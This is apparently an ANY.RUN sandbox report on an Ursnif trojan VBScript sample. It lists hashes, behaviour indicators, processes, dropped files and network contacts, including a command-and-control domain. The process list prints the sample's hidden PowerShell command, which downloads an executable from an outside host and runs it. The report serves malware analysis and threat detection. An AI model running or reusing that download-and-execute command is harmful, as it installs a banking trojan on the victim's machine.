analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Ursnif.vbs

Full analysis: https://app.any.run/tasks/f6198a2a-e3c2-48dd-b1ab-dcd723770fd1
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: April 15, 2019, 08:46:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
trojan
ursnif
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines
MD5:

6D245368F247897B930BB5F597B08ABC

SHA1:

E49AE7F11255D5C4CA42A38AEEAA70D738F8CB59

SHA256:

29D355127B54288F1CAE45EA3FF6A59C3BEF1995ACA15AD538679E48FC9F58EE

SSDEEP:

768:cLRy4HSxzDCYYh2A9anpa3E5K5WOrAM7MPaCq05iS2/o92sV4DNTCjPRMQCiaH9o:Wd4nCYYh2A9anpamKRe

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • dVjiJafHlc.exe (PID: 2960)
    • Connects to CnC server

      • IEXPLORE.EXE (PID: 2416)
      • dVjiJafHlc.exe (PID: 2960)
      • IEXPLORE.EXE (PID: 3004)
      • IEXPLORE.EXE (PID: 1336)
      • IEXPLORE.EXE (PID: 2288)
      • IEXPLORE.EXE (PID: 1688)
      • IEXPLORE.EXE (PID: 2148)
      • IEXPLORE.EXE (PID: 1912)
    • Changes settings of System certificates

      • dVjiJafHlc.exe (PID: 2960)
  • SUSPICIOUS

    • Reads the machine GUID from the registry

      • WScript.exe (PID: 1796)
      • powershell.exe (PID: 1008)
    • Executes PowerShell scripts

      • WScript.exe (PID: 1796)
    • Creates files in the user directory

      • powershell.exe (PID: 1008)
    • Adds / modifies Windows certificates

      • dVjiJafHlc.exe (PID: 2960)
  • INFO

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2808)
      • iexplore.exe (PID: 2948)
      • iexplore.exe (PID: 2804)
      • iexplore.exe (PID: 2564)
      • iexplore.exe (PID: 1952)
      • iexplore.exe (PID: 2356)
      • iexplore.exe (PID: 2352)
    • Reads the machine GUID from the registry

      • iexplore.exe (PID: 2808)
      • iexplore.exe (PID: 2948)
      • iexplore.exe (PID: 2564)
      • iexplore.exe (PID: 2804)
      • iexplore.exe (PID: 1952)
      • iexplore.exe (PID: 2356)
      • iexplore.exe (PID: 2352)
    • Reads internet explorer settings

      • IEXPLORE.EXE (PID: 2416)
      • IEXPLORE.EXE (PID: 3004)
      • IEXPLORE.EXE (PID: 1336)
      • IEXPLORE.EXE (PID: 2288)
      • IEXPLORE.EXE (PID: 1688)
      • IEXPLORE.EXE (PID: 2148)
      • IEXPLORE.EXE (PID: 1912)
    • Changes internet zones settings

      • iexplore.exe (PID: 2808)
      • iexplore.exe (PID: 2948)
      • iexplore.exe (PID: 2804)
      • iexplore.exe (PID: 2564)
      • iexplore.exe (PID: 1952)
      • iexplore.exe (PID: 2356)
      • iexplore.exe (PID: 2352)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 2808)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
54
Monitored processes
17
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe no specs dvjijafhlc.exe iexplore.exe iexplore.exe iexplore.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe

Process information

PID
CMD
Path
Indicators
Parent process
1796"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Ursnif.vbs"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1008"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -exec bypass -nop if($host.version.major -lt 3){Import-Module BitsTransfer} Start-BitsTransfer -Source https://saintsandsinnersbar.com/duplicate/answear.xls -Destination $env:temp\dVjiJafHlc.exe; Start-Process $env:temp\dVjiJafHlc.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2960"C:\Users\admin\AppData\Local\Temp\dVjiJafHlc.exe" C:\Users\admin\AppData\Local\Temp\dVjiJafHlc.exe
powershell.exe
User:
admin
Company:
INCA Internet Co., Ltd.
Integrity Level:
MEDIUM
Description:
nProtect KeyCrypt Program Database DLL
Version:
2003, 10, 1, 1
2808"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
2416"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2808 CREDAT:267521 /prefetch:2C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
2948"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
3004"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2948 CREDAT:267521 /prefetch:2C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
2804"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
1336"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2804 CREDAT:267521 /prefetch:2C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
2564"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Total events
3 256
Read events
2 880
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
58
Unknown types
0

Dropped files

PID
Process
Filename
Type
1008powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QBZWYTJV50AT3S9CXA92.temp
MD5:
SHA256:
2808iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF5ED5CA240DE2A9F8.TMP
MD5:
SHA256:
2808iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF63441D3CEDEAF03E.TMP
MD5:
SHA256:
2808iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{1DBBD091-5F5B-11E9-8447-5254004AAD21}.dat
MD5:
SHA256:
1008powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF1b40ed.TMPbinary
MD5:B4E3FCBE4C648CA62B42BB2F78B08567
SHA256:E8762DDC8035A4D4803702B3657FC9AD336D06FCA461F210A47551D60A68AD1D
2808iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\iecompatviewlist[1].xmlxml
MD5:F68A128CDAFA596C331514CA90B91859
SHA256:FB563F15F30BFB70F2BFA796047D1036454523E454ED792109B84F0DE5F68072
2808iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{1DBBD093-5F5B-11E9-8447-5254004AAD21}.datbinary
MD5:AAF32970BE516600EB1080796DF8DB60
SHA256:76FB94D20E795CBB395B9B1A5B21269655137133D7C3B56DFA09FAE303D7918C
2948iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF3CD11017FE22700B.TMP
MD5:
SHA256:
1008powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:B4E3FCBE4C648CA62B42BB2F78B08567
SHA256:E8762DDC8035A4D4803702B3657FC9AD336D06FCA461F210A47551D60A68AD1D
2948iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{31CDBC31-5F5B-11E9-8447-5254004AAD21}.dat
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
16
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
8.250.159.254:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?db72ca03691fe7ab
US
compressed
55.6 Kb
whitelisted
GET
200
192.35.177.64:80
http://apps.identrust.com/roots/dstrootcax3.p7c
US
cat
893 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.35.177.64:80
apps.identrust.com
IdenTrust
US
malicious
8.250.159.254:80
ctldl.windowsupdate.com
Level 3 Communications, Inc.
US
unknown
2808
iexplore.exe
152.199.19.161:443
iecvlist.microsoft.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
94.23.14.191:443
saintsandsinnersbar.com
OVH SAS
FR
unknown
2960
dVjiJafHlc.exe
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
2416
IEXPLORE.EXE
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
3004
IEXPLORE.EXE
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
1336
IEXPLORE.EXE
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
1688
IEXPLORE.EXE
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
2288
IEXPLORE.EXE
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious

DNS requests

Domain
IP
Reputation
saintsandsinnersbar.com
  • 94.23.14.191
unknown
apps.identrust.com
  • 192.35.177.64
shared
ctldl.windowsupdate.com
  • 8.250.159.254
  • 8.250.137.254
  • 8.247.201.254
  • 8.247.202.254
  • 8.248.237.254
whitelisted
itschoolegz.com
  • 46.17.45.108
malicious
iecvlist.microsoft.com
  • 152.199.19.161
whitelisted
r20swj13mr.microsoft.com
  • 152.199.19.161
whitelisted

Threats

Found threats are available for the paid subscriptions
9 ETPRO signatures available at the full report
No debug info